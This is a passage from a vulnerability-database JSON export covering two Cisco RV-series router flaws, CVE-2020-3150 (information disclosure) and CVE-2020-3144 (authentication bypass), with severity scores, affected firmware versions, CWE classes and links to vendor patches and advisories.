              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.6,
                "id": "CVE-2020-3150",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 1.1,
                "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Medium",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 4.3,
                "confidentialityImpact": "Partial",
                "exploitabilityScore": null,
                "id": "JVNDB-2020-008403",
                "impactScore": null,
                "integrityImpact": "None",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "Medium",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 4.3,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.6,
                "id": "CNVD-2020-44623",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "HIGH",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 5.9,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.2,
                "id": "CVE-2020-3150",
                "impactScore": 3.6,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.1"
              },
              {
                "attackComplexity": "HIGH",
                "attackVector": "NETWORK",
                "author": "ykramarz@cisco.com",
                "availabilityImpact": "NONE",
                "baseScore": 5.9,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.2,
                "id": "CVE-2020-3150",
                "impactScore": 3.6,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.0"
              },
              {
                "attackComplexity": "High",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 5.9,
                "baseSeverity": "Medium",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2020-008403",
                "impactScore": null,
                "integrityImpact": "None",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2020-3150",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "ykramarz@cisco.com",
                "id": "CVE-2020-3150",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "JVNDB-2020-008403",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2020-44623",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202007-1050",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULMON",
                "id": "CVE-2020-3150",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-44623"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-3150"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-008403"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202007-1050"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-3150"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-3150"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "A vulnerability in the web-based management interface of Cisco Small Business RV110W and RV215W Series Routers could allow an unauthenticated, remote attacker to download sensitive information from the device, which could include the device configuration. The vulnerability is due to improper authorization of an HTTP request. An attacker could exploit this vulnerability by accessing a specific URI on the web-based management interface of the router, but only after any valid user has opened a specific file on the device since the last reboot. A successful exploit would allow the attacker to view sensitive information, which should be restricted. Cisco Small Business RV110W Wireless-N VPN Firewall Routers is a VPN router of the US Cisco (Cisco). \n\r\n\r\nCisco Small Business RV110W Wireless-N VPN Firewall versions prior to 1.2.2.8 and RV215W Wireless-N VPN Router versions prior to 1.3.1.7 have authorization issues in the Web management interface",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2020-3150"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-008403"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-44623"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-3150"
          }
        ],
        "trust": 2.25
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2020-3150",
            "trust": 3.1
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-008403",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2020-44623",
            "trust": 0.6
          },
          {
            "db": "NSFOCUS",
            "id": "47677",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2020.2417",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202007-1050",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-3150",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-44623"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-3150"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-008403"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202007-1050"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-3150"
          }
        ]
      },
      "id": "VAR-202007-1016",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-44623"
          }
        ],
        "trust": 1.2174547833333333
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-44623"
          }
        ]
      },
      "last_update_date": "2024-11-23T21:59:08.800000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-rv-info-dis-FEWBWgsD",
            "trust": 0.8,
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-info-dis-FEWBWgsD"
          },
          {
            "title": "Patch for Cisco Small Business RV110W Wireless-N VPN Firewall and RV215W Wireless-N VPN Router authorization issue vulnerability",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/227879"
          },
          {
            "title": "Cisco Small Business RV110W  and RV215W Series Routers Remediation measures for authorization problem vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=124127"
          },
          {
            "title": "Cisco: Cisco Small Business RV110W and RV215W Series Routers Information Disclosure Vulnerability",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-rv-info-dis-FEWBWgsD"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-44623"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-3150"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-008403"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202007-1050"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-863",
            "trust": 1.8
          },
          {
            "problemtype": "CWE-285",
            "trust": 1.0
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-008403"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-3150"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.4,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-rv-info-dis-fewbwgsd"
          },
          {
            "trust": 2.0,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2020-3150"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-3150"
          },
          {
            "trust": 0.6,
            "url": "http://www.nsfocus.net/vulndb/47677"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2020.2417/"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/863.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-44623"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-3150"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-008403"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202007-1050"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-3150"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2020-44623"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-3150"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-008403"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202007-1050"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-3150"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-07-31T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-44623"
          },
          {
            "date": "2020-07-16T00:00:00",
            "db": "VULMON",
            "id": "CVE-2020-3150"
          },
          {
            "date": "2020-09-11T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2020-008403"
          },
          {
            "date": "2020-07-15T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202007-1050"
          },
          {
            "date": "2020-07-16T18:15:16.817000",
            "db": "NVD",
            "id": "CVE-2020-3150"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2020-08-06T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2020-44623"
          },
          {
            "date": "2020-07-22T00:00:00",
            "db": "VULMON",
            "id": "CVE-2020-3150"
          },
          {
            "date": "2020-09-11T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2020-008403"
          },
          {
            "date": "2020-08-12T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202007-1050"
          },
          {
            "date": "2024-11-21T05:30:25.813000",
            "db": "NVD",
            "id": "CVE-2020-3150"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202007-1050"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Cisco Small Business RV110W and  RV215W Unauthorized authentication vulnerabilities in series routers",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-008403"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "authorization issue",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202007-1050"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202007-0997

    Vulnerability from variot - Updated: 2024-11-23 21:59

    A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, RV130 VPN Router, RV130W Wireless-N Multifunction VPN Router, and RV215W Wireless-N VPN Router could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary commands with administrative commands on an affected device. The vulnerability is due to improper session management on affected devices. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected device. A successful exploit could allow the attacker to gain administrative access on the affected device. plural Cisco RV A series router contains an authentication vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202007-0997",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rv110w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "rv215w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv130w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.55"
          },
          {
            "model": "rv130",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.55"
          },
          {
            "model": "rv110w wireless-n vpn firewall",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130w wireless-n multifunction vpn routerr",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-008400"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-3144"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv110w_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv130w_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv215w_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv130_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-008400"
          }
        ]
      },
      "cve": "CVE-2020-3144",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2020-3144",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 1.1,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "Partial",
                "baseScore": 7.5,
                "confidentialityImpact": "Partial",
                "exploitabilityScore": null,
                "id": "JVNDB-2020-008400",
                "impactScore": null,
                "integrityImpact": "Partial",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "High",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2020-3144",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "ykramarz@cisco.com",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2020-3144",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "JVNDB-2020-008400",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2020-3144",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "ykramarz@cisco.com",
                "id": "CVE-2020-3144",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "JVNDB-2020-008400",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202007-1143",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULMON",
                "id": "CVE-2020-3144",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2020-3144"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-008400"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202007-1143"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-3144"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-3144"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, RV130 VPN Router, RV130W Wireless-N Multifunction VPN Router, and RV215W Wireless-N VPN Router could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary commands with administrative commands on an affected device. The vulnerability is due to improper session management on affected devices. An attacker could exploit this vulnerability by sending a crafted HTTP request to the affected device. A successful exploit could allow the attacker to gain administrative access on the affected device. plural Cisco RV A series router contains an authentication vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2020-3144"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-008400"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-3144"
          }
        ],
        "trust": 1.71
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2020-3144",
            "trust": 2.5
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-008400",
            "trust": 0.8
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2020.2417",
            "trust": 0.6
          },
          {
            "db": "NSFOCUS",
            "id": "48352",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202007-1143",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-3144",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2020-3144"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-008400"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202007-1143"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-3144"
          }
        ]
      },
      "id": "VAR-202007-0997",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.611919898
      },
      "last_update_date": "2024-11-23T21:59:08.770000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-rv-auth-bypass-cGv9EruZ",
            "trust": 0.8,
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-auth-bypass-cGv9EruZ"
          },
          {
            "title": "Multiple Cisco Product Authorization Issue Vulnerability Fixing Measures",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=124927"
          },
          {
            "title": "The Register",
            "trust": 0.2,
            "url": "https://www.theregister.co.uk/2020/07/16/cisco_patches_july/"
          },
          {
            "title": "Cisco: Cisco RV110W, RV130, RV130W, and RV215W Routers Authentication Bypass Vulnerability",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-rv-auth-bypass-cGv9EruZ"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2020-3144"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-008400"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202007-1143"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-287",
            "trust": 1.8
          },
          {
            "problemtype": "CWE-284",
            "trust": 1.0
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-008400"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-3144"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.4,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-rv-auth-bypass-cgv9eruz"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2020-3144"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-3144\\"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2020.2417/"
          },
          {
            "trust": 0.6,
            "url": "http://www.nsfocus.net/vulndb/48352"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/287.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2020-3144"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2020-008400"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202007-1143"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-3144"
          }
        ]
      },
      "sources": {
        "@context": {
